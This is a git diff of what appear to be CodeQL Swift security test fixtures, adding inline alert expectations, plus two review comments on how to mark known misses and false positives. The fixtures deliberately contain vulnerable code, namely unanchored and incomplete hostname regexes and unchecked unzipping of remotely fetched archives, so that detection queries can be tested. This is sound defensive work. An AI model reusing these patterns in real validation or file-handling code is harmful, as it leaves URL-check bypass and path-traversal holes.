+++ b/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-diagnostics/ExtractedFiles.ql
+query: diagnostics/ExtractedFiles.ql
diff --git a/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref b/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref
index 26996e64988e..3742e604b165 100644
--- a/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref
+++ b/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref
@@ -1 +1 @@
-diagnostics/SuccessfullyExtractedLines.ql
+query: diagnostics/SuccessfullyExtractedLines.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref b/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref
index b80ac364258b..6b46d67a8493 100644
--- a/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-020/IncompleteHostnameRegex.ql
+query: queries/Security/CWE-020/IncompleteHostnameRegex.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref
index 9b1f04d1a7a2..4e76e1995e9c 100644
--- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-020/MissingRegexAnchor.ql
+query: queries/Security/CWE-020/MissingRegexAnchor.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift
index 3b0abe53048d..5f2b0924c8c0 100644
--- a/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift
+++ b/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift
@@ -47,63 +47,63 @@ class NSString : NSObject { func tests(input: String) throws { _ = try Regex("^a|").firstMatch(in: input) - _ = try Regex("^a|b").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|b").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|^b").firstMatch(in: input) _ = try Regex("^a|^b").firstMatch(in: input) - _ = try Regex("^a|b|c").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|b|c").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|^b|c").firstMatch(in: input) _ = try Regex("a|b|^c").firstMatch(in: input) _ = try Regex("^a|^b|c").firstMatch(in: input) _ = try Regex("(^a)|b").firstMatch(in: input) - _ = try Regex("^a|(b)").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|(b)").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("^a|(^b)").firstMatch(in: input) - _ = try Regex("^(a)|(b)").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^(a)|(b)").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex("a|b$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("a|b$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a$|b").firstMatch(in: input) _ = try Regex("a$|b$").firstMatch(in: input) - _ = try Regex("a|b|c$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("a|b|c$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|b$|c").firstMatch(in: input) _ = try Regex("a$|b|c").firstMatch(in: input) _ = try Regex("a|b$|c$").firstMatch(in: input) _ = try Regex("a|(b$)").firstMatch(in: input) - _ = try Regex("(a)|b$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("(a)|b$").firstMatch(in: input) // BAD (missing anchor) // $ 
Alert[swift/missing-regexp-anchor] _ = try Regex("(a$)|b$").firstMatch(in: input) - _ = try Regex("(a)|(b)$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("(a)|(b)$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex(#"^good.com|better.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\.com|better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\.com|better\\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\\.com|better\\\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\\\.com|better\\\\.com"#).firstMatch(in: input) // BAD (missing anchor) + _ = try Regex(#"^good.com|better.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\.com|better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\.com|better\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\\.com|better\\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\\\.com|better\\\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex("^foo|bar|baz$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^foo|bar|baz$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("^foo|%").firstMatch(in: input) } func realWorld(input: String) throws { // real-world examples that have been anonymized a bit // the following are bad: - _ = try Regex(#"(\.xxx)|(\.yyy)|(\.zzz)$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"(^left|right|center)\sbottom$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try 
Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"\.xxx|\.yyy|zzz$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^([A-Z]|xxx[XY]$)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx:)|(yyy:)|(zzz:)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx?:)|(yyy:zzz\/)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^@media|@page"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^\s*(xxx?|yyy|zzz):|xxx:yyy"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^click|mouse|touch"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^http://good\.com|http://better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^https?://good\.com|https?://better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^mouse|touch|click|contextmenu|drop|dragover|dragend"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^xxx:|yyy:"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"_xxx|_yyy|_zzz$"#).firstMatch(in: input) // BAD (missing anchor) + _ = try Regex(#"(\.xxx)|(\.yyy)|(\.zzz)$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"(^left|right|center)\sbottom$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try 
Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"\.xxx|\.yyy|zzz$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^([A-Z]|xxx[XY]$)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx:)|(yyy:)|(zzz:)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx?:)|(yyy:zzz\/)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^@media|@page"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^\s*(xxx?|yyy|zzz):|xxx:yyy"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^click|mouse|touch"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^http://good\.com|http://better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^https?://good\.com|https?://better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^mouse|touch|click|contextmenu|drop|dragover|dragend"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^xxx:|yyy:"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"_xxx|_yyy|_zzz$"#).firstMatch(in: input) // BAD (missing 
anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex(#"em|%$"#).firstMatch(in: input) // BAD (missing anchor) [NOT DETECTED] - not flagged at the moment due to the anchor not being for letters // the following are MAYBE OK due to apparent complexity; not flagged diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index b2e8810e7b75..bb25bd54c14f 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift 
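Review bot: The `em|%$` case near the end of the bad examples in `realWorld` keeps only its free-text `[NOT DETECTED]` marker and gets no inline expectation, so the known false negative is not tracked by the expectations post-processing that `MissingRegexAnchor.qlref` now enables for this directory. Since every neighbouring bad line now carries `// $ Alert[swift/missing-regexp-anchor]`, the miss could be recorded the same way, as `// $ MISSING: Alert[swift/missing-regexp-anchor]`. That keeps the test passing today and makes the test output report the line once the query starts flagging the pattern, instead of relying on someone rereading the comment. `realWorld` continues past the end of this hunk, so any further `[NOT DETECTED]` lines there would presumably want the same treatment.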
@@ -59,36 +59,36 @@ func tests(url: String, secure: Bool) throws { let input = "http://evil.com/?http://good.com" let inputRange = NSMakeRange(0, input.utf16.count) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "^https?://good.com").matches(in: input, range: inputRange) // BAD (missing post-anchor) - _ = try NSRegularExpression(pattern: "(^https?://good1.com)|(^https?://good2.com)").matches(in: input, range: inputRange) // BAD (missing post-anchor) - _ = try NSRegularExpression(pattern: "(https?://good.com)|(^https?://goodie.com)").matches(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "^https?://good.com").matches(in: input, range: inputRange) // BAD (missing post-anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "(^https?://good1.com)|(^https?://good2.com)").matches(in: input, range: inputRange) // BAD (missing post-anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "(https?://good.com)|(^https?://goodie.com)").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try NSRegularExpression(pattern: #"https?:\/\/good.com"#).matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: 
#"https?:\/\/good.com"#).matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - if let _ = try NSRegularExpression(pattern: "https?://good.com").firstMatch(in: input, range: inputRange) { } // BAD (missing anchor) + if let _ = try NSRegularExpression(pattern: "https?://good.com").firstMatch(in: input, range: inputRange) { } // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] let input2 = "something" let input2Range = NSMakeRange(0, input2.utf16.count) _ = try NSRegularExpression(pattern: "other").firstMatch(in: input2, range: input2Range) // OK _ = try NSRegularExpression(pattern: "x.commissary").firstMatch(in: input2, range: input2Range) // OK - _ = try NSRegularExpression(pattern: #"https?://good.com"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: #"https?://good.com"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below - "^https?://good.com" // BAD (missing post-anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] + "^https?://good.com" // BAD (missing post-anchor), referenced below // $ 
Alert[swift/missing-regexp-anchor] ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } } let trustedUrlRegexs2 = [ - "https?://good.com", // BAD (missing anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] ] if let _ = try NSRegularExpression(pattern: trustedUrlRegexs2[0]).firstMatch(in: input, range: inputRange) { } @@ -98,13 +98,13 @@ func tests(url: String, secure: Bool) throws { for _ in notUsedUrlRegexs { } - _ = try NSRegularExpression(pattern: #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try NSRegularExpression(pattern: "https://verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: "http" + (secure ? "s" : "") + "://" + "verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: "verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: #"\.com|\.org"#).matches(in: input, range: inputRange) // OK, has no domain name - _ = try NSRegularExpression(pattern: #"example\.com|whatever"#).matches(in: input, range: inputRange) // OK, the other disjunction doesn't match a hostname [FALSE POSITIVE] + _ = try NSRegularExpression(pattern: #"example\.com|whatever"#).matches(in: input, range: inputRange) // OK, the other disjunction doesn't match a hostname [FALSE POSITIVE] // $ Alert[swift/missing-regexp-anchor] // tests for the `isLineAnchoredHostnameRegExp` case 
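Review bot: The `example\.com|whatever` line in the `@@ -98,13 +98,13 @@` hunk is still commented `OK ... [FALSE POSITIVE]`, but it is annotated with a plain `// $ Alert[swift/missing-regexp-anchor]`, so the expectation now reads as a wanted result. The inline-expectations convention for a known false positive is `// $ SPURIOUS: Alert[swift/missing-regexp-anchor]`, which keeps the test passing while recording that the alert is unwanted. The same applies to `^(example.dev|example.com)` in the `testHostnames` hunk of `CWE-020/test.swift`. The `[NOT DETECTED]` cases there (for example `let hostname = #"test.example.com$"#`) would likewise be clearer with `// $ MISSING: Alert[swift/incomplete-hostname-regexp]`. The body of `tests(url:secure:)` continues outside this hunk.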
diff --git a/swift/ql/test/query-tests/Security/CWE-020/test.swift b/swift/ql/test/query-tests/Security/CWE-020/test.swift index e19af9050fd3..c5592ad335e0 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/test.swift 
@@ -53,49 +53,49 @@ func testHostnames(myUrl: URL) throws { _ = try Regex(#"^http://example\.com/"#).firstMatch(in: tainted) // GOOD _ = try Regex(#"^http://example.com/"#).firstMatch(in: tainted) // GOOD (only '.' here gives a valid top-level domain) - _ = try Regex(#"^http://example.com"#).firstMatch(in: tainted) // BAD (missing anchor) + _ = try Regex(#"^http://example.com"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex(#"^http://test\.example\.com/"#).firstMatch(in: tainted) // GOOD _ = try Regex(#"^http://test\.example.com/"#).firstMatch(in: tainted) // GOOD (only '.' here gives a valid top-level domain) - _ = try Regex(#"^http://test\.example.com"#).firstMatch(in: tainted) // BAD (missing anchor) - _ = try Regex(#"^http://test.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(#"^http://test\.example.com"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^http://test.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(#"^http://test[.]example[.]com/"#).firstMatch(in: tainted) // GOOD (alternative method of escaping) - _ = try Regex(#"^http://test.example.net/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://test.(example-a|example-b).com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://(.+).example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname x 2) + _ = try Regex(#"^http://test.example.net/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://test.(example-a|example-b).com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://(.+).example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname x 2) // $ 
Alert[swift/incomplete-hostname-regexp] _ = try Regex(#"^http://(\.+)\.example.com/"#).firstMatch(in: tainted) // GOOD - _ = try Regex(#"^http://(?:.+)\.test\.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://test.example.com/(?:.*)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(.+\.(?:example-a|example-b)\.com)/"#).firstMatch(in: tainted) // BAD (missing anchor) - _ = try Regex(#"^(https?:)?//((service|www).)?example.com(?=$|/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(http|https)://www.example.com/p/f/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(http://sub.example.com/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^https?://api.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(#"^http://(?:.+)\.test\.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://test.example.com/(?:.*)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(.+\.(?:example-a|example-b)\.com)/"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(https?:)?//((service|www).)?example.com(?=$|/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(http|https)://www.example.com/p/f/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(http://sub.example.com/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^https?://api.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try 
Regex(#"^http[s]?://?sub1\.sub2\.example\.com/f/(.+)"#).firstMatch(in: tainted) // GOOD (it has a capture group after the TLD, so should be ignored) - _ = try Regex(#"^https://[a-z]*.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(example.dev|example.com)"#).firstMatch(in: tainted) // GOOD (any extended hostname wouldn't be included in the capture group) [FALSE POSITIVE] - _ = try Regex(#"^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)"#).firstMatch(in: tainted) // BAD (incomplete hostname x3, missing anchor x 1) + _ = try Regex(#"^https://[a-z]*.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(example.dev|example.com)"#).firstMatch(in: tainted) // GOOD (any extended hostname wouldn't be included in the capture group) [FALSE POSITIVE] // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)"#).firstMatch(in: tainted) // BAD (incomplete hostname x3, missing anchor x 1) // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] _ = try Regex(#"^http://(..|...)\.example\.com/index\.html"#).firstMatch(in: tainted) // GOOD (wildcards are intentional) _ = try Regex(#"^http://.\.example\.com/index\.html"#).firstMatch(in: tainted) // GOOD (the wildcard is intentional) - _ = try Regex(#"^(foo.example\.com|whatever)$"#).firstMatch(in: tainted) // DUBIOUS (one disjunction doesn't even look like a hostname) [DETECTED incomplete hostname, missing anchor] + _ = try Regex(#"^(foo.example\.com|whatever)$"#).firstMatch(in: tainted) // DUBIOUS (one disjunction doesn't even look like a hostname) [DETECTED incomplete hostname, missing anchor] // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] - _ = try Regex(#"^test.example.com$"#).firstMatch(in: tainted) // BAD (incomplete 
hostname) - _ = try Regex(#"test.example.com"#).wholeMatch(in: tainted) // BAD (incomplete hostname, missing anchor) + _ = try Regex(#"^test.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"test.example.com"#).wholeMatch(in: tainted) // BAD (incomplete hostname, missing anchor) // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] - _ = try Regex(id(id(id(#"test.example.com$"#)))).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(id(id(id(#"test.example.com$"#)))).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] let hostname = #"test.example.com$"# // BAD (incomplete hostname) [NOT DETECTED] _ = try Regex("\(hostname)").firstMatch(in: tainted) var domain = MyDomain("") - domain.hostname = #"test.example.com$"# // BAD (incomplete hostname) + domain.hostname = #"test.example.com$"# // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(domain.hostname).firstMatch(in: tainted) func convert1(_ domain: MyDomain) throws -> Regex { return try Regex(domain.hostname) } - _ = try convert1(MyDomain(#"test.example.com$"#)).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try convert1(MyDomain(#"test.example.com$"#)).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] let domains = [ MyDomain(#"test.example.com$"#) ] // BAD (incomplete hostname) [NOT DETECTED] func convert2(_ domain: MyDomain) throws -> Regex { diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected index 013959ee4505..47477a9aa60f 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected 
@@ -1,3 +1,6 @@ +#select +| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | +| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | edges | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:62:60:62:60 | source | provenance | Config | | UnsafeUnpack.swift:62:60:62:60 | source | UnsafeUnpack.swift:64:27:64:27 | source | provenance | | @@ -8,6 +11,3 @@ nodes | UnsafeUnpack.swift:64:27:64:27 | source | semmle.label | source | | UnsafeUnpack.swift:67:39:67:39 | source | semmle.label | source | subpaths -#select -| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | -| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref index 1d1a5a3a84ce..f637622e3a15 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022/UnsafeUnpack.ql \ No newline at end of file +query: experimental/Security/CWE-022/UnsafeUnpack.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift index 5d7dc6c58b44..e2071513e3c9 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift @@ -59,12 +59,12 @@ func testCommandInjectionQhelpExamples() { let source = URL(fileURLWithPath: "/sourcePath") let destination = URL(fileURLWithPath: "/destination") - try Data(contentsOf: remoteURL, options: []).write(to: source) + try Data(contentsOf: remoteURL, options: []).write(to: source) // $ Source do { - try Zip.unzipFile(source, destination: destination, overwrite: true, password: nil) // BAD + try Zip.unzipFile(source, destination: destination, overwrite: true, password: nil) // BAD // $ Alert let fileManager = FileManager() - try fileManager.unzipItem(at: source, to: destination) // BAD + try fileManager.unzipItem(at: source, to: destination) // BAD // $ Alert } catch { print("Error: \(error)") } diff --git a/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref index 87be59af70b3..802e59a6f873 100644 --- a/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref @@ -1 +1 @@ -queries/Security/CWE-078/CommandInjection.ql \ No newline at end of file +query: queries/Security/CWE-078/CommandInjection.ql diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected index c2fefc171e64..d796aa2da25e 100644 --- 